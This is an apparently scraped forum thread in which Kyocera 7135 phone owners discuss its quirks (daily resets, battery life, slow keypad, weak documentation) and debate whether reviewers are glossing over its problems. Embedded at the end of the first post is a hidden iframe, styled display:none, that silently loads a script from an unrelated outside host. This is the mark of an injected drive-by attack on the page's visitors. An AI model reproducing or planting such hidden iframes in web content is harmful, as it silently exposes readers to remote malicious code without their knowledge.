I have been reading the post here for quite a while and have been very excited for this phone. I got it on Tuesday and am still enjoying it. But we need to not kid ourselves with the phone and its drawbacks. Some folks do not have the money (or have work buying it for them) and it is a large cost so we should be as honest as we can. We should not bash those that have negative comments or get defensive. This phone does have some problems, but overall I still feel it is a great phone. I will post my review seperatly in http://www.smartphonesource.com/vbul...3469#post63469
But lets give folks a real opinion and not be blind to problems with the phone.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
I really like the phone, it was bought on my winnings from a fantasy football league. Otherwise I probably wouldn't have bought it. I am low tech compared to a lot of people, so I don't have a lot of technical issues.
My only problem is the fatal resets!! It happends once a day and it is a pain in my ass!!
That is my only issue. I really like this phone. I also wish they made a horizontal pouch for it. I bought one from DirectCellular and it does not fit.
This is the kind of all in one gaget that a salesperson like me really enjoys. I am on the road (locally) and really enjoy it except for those resets!!

Honest...if you desire a combination phone/PDA, and you are a heavy user on the phone side, this is CLEARLY the best option on the market. However, it is still considerably rough around the edges and because of it's quirks, some low-tech consumers are going to be frustrated with this phone. For me it is wonderful. Its strengths so far outweigh its weaknesses that I have absolutely no regrets. I was fortunate that I didn't have to shell out the money to purchase mine, but I did purchase the phone that preceeded this one (my 6035 - which I also loved) and I would buy a 7135 in a heartbeat!
I've had very few problems with it. I think if it hadn't been for this forum and the great people who participate in it, that it would have been a lot more difficult to figure out some of the "quirks", especially since the documentation is absolutely dreadful! I really feel for the less technically inclined users.
Kyocera and Verizon should be supporting and promoting this forum as I'm sure it's keeping a lot of people from calling tech support since they can find better and quicker information here.
Originally when I heard about this phone and its expected price, I was going to stay away and keep using my 6035 as long as I could and wait for the price to drop. But then I got to see and hold the 7135 while I was beta testing another Kyo phone (a really dumb one no less) and then I got to play with my brother's 7135 over Christmas and I was hooked and had to have it.
Quite frankly the only feature on this phone that I was NOT excited about was the SD disk. Playing MP3's was the last thing I was looking for when upgrading from my 6035. As it turns out, the SD disk is now one of my favorite features. Now, along with Backup Buddy installed, I can venture far away from the desktop without fear of total data loss.
I wish that EN was available everywhere. Then it might be worth the relatively high cost. For that matter, I wish QNC was available everywhere too, mainly to stay up to date w/email when out of a digital service area.
But I'll be patient, suffer through an ocassional blank screen, and wait for the world to catch up to my new toy.

Ditto!

I'm glad you've decided to take a positive approach to the posters as well as the phone.
Frankly, I don't think anyone here has been dishonest about their views. I don't have stock in Kyocero so the success or failure of one of its phones will not have any financial impact to me. Why should I or anyone else without Kyocera stock be dishonest? I do think people who get something and it doesn't work for them get way too bent out of shape about it. Hey, you can always return the thing within a specified time. If it does not work for you, return it, get your money back, and get on with your life. Why spend time on a forum whining about it? :dunno
The phone does have a lot of quirks and some bugs. Nothing about it has caused me to change my mind about retaining it -- for now. If something better comes along, I'm there. "Better" for me is a slightly smaller form factor, a high resolution screen, and ALL of the features which exist in the 7135 (including the SD expansion and the Palm OS). I wish more screen space could have been achieved just below the ear piece.
Folks, I really like this phone, it adds great utility to my work, yes it has its limitations (some are very confusing), the main one for me is battery life but I have work-arounds for it. Yes the phone is costly but so are most of the other PDA/Phone combos that you have to compare the 7135 too.
Additionally, this is a free speech area, I like (very much) being able to read all (good and bad) opinions, they allow me to calibrate my thoughts. So if you do your research and determine that yes, you do want the 7135 then by all means get it and if your research yields that you don't want the phone then that's fine as well.
I do like the phone, and glad that I waited for it.
Cheers,

Enjoy the journey, it should be just as much fun as the destination.
I've carried handheld devices since the earliest Sharp Wizards and Motorola bag phones more than 15 years ago. I count six Palm models alone. Lately, it was a Palm i705 and a StarTac. The 7135 replaces both, and vastly improves on both. It's superb, and will get better. With the exception of the stereo headset's crummy earbuds, the accessories are excellent: beefy cradle with extra slot, very functional holster, reasonably priced leather case and extra battery and very nice handsfree set up for the car. As with everything, there are things I'd improve if I could. Here's my suggestions: Replace the up/down volume keys with a jog dial, user programmable and multi-use by application. Lighten the weight, cut the thickness. Beef up the wimpy keypad backlight. 320 x 320 resolution. Larger top LCD. Forget the phone application entirely (why in the world isn't it touch?), and replace with a pure Palm interface like Shimon's excellent TAKEphONE. I expect if the product takes off, we'll see exactly these kinds of improvements. As is, it beats the competition hands down on the strength of the SD card and replaceable battery alone--a slam-dunk advantage over the slightly thinner and lighter (but wider) Treo. Who needs a tiny keyboard? Grafitti freed us from those.
I love my Kyo 7135 just enough to trade it in for a Kyocera 8135 as soon as those become available! Until then, I'm having plenty of fun and don't regret my purchase for one second.
I love this phone so far. Perfect? No. But I have been nursing my Sony Clie and my Nokia phone for many months while waiting for an alternative. Both of my older devices were being held together with a combination of tape and glue. I had to do a daily 10 minute ritual of manipulation just to get my Clie to sync. So the 7135 was perfect for me since I HAD TO replace BOTH devices.
Overall, it's a great device. I too wish for all the things mentioned above, but couldn't wait another year for them to come out. The main thing I am disappointed about is the incredible slow responsiveness on the phone's keypad. The battery life is only an issue is you are rarely near a car or electrical outlet. The Treo has the same issue, but without a user replaceable battery.
The Samsung SGH i500 may be the next major (?) improvement, but who knows when that is coming out. I plan on keeping this phone for about 2 years (I hope) until something far superior comes out, or until it finally dies on me.
Beryl. I think the attitude I read into your message is what I am talking about. I did not take a negative view towards this board, the posters or the phone. But I think some folks are glossing over issues. It is not that you are not being honest, but I think have rose colored glasses on in regards to this phone.
That said I think it is a great phone for a lot of people, but there are issues with the phone that make it not great for others. Lets make sure we give not only all the good, but all the bad in a realistic light so those that need to decide if this device is right for them.
Again that said I like the phone and think it is the best one out there for me.
I have had my 7035 for almost two weeks. I have downloaded games and apps and 2 different web browsers. Plus lots of ringtones from this board. I have a sd 256 with backup buddy. I have had zero problems. The only soft resets was when I installed the ringtones. I have pictures and music. This phone meets and surpasses my expectations.

I don't agree but how does what I say or feel about a phone effect you? I am very happy with this phone -- it is the bomb! None of the quirks bother me enough for me to whine about them.

End of lecture?
If you have information positive or negative, by all means share it if that is what you want to do. I'm all ears and very interested in YOUR views. (I don't think anyone needs to be told what THEY need to do.) There is always a honeymoon period with new gadgets so I expect that more negative remarks will come with time. Because of this, I don't have any strong negative thoughts to share about this phone. It is a fun techno-gadget and when it stops being fun, I'm on to something else. It is not that serious. It is just a phone.

(ducking)
That's generally how I feel about it also. I haven't seen any of the "happy" 7135 owners saying things along the lines of "get the 7135 and it will change your life like it has changed mine". But I have seen several of the "disgruntled" (whining) 7135 owners trying to warn people off.
I say just stick to telling about your own personal experiences with your 7135. The majority of the people that are members or guests here are smart enough to come to their own conclusions.
(not ducking..... you want a piece of me? ) (j/k) :p

But they may bother others who are thinking about purchasing the phone. I am just saying lets tell both sides. Say it does not bother you, but let others know about it so they can decide it it would be to much for them.
By the way, it does not affect me (but not knowing some of the quirks because they were glossed over did bug me) I can live with them, but would have been nice to know about them just in case.
Walt,
Could you give some examples of quirks you would've liked to have known before you purchased? That would make it easier to discuss our opinions of how serious a certain quirk is.
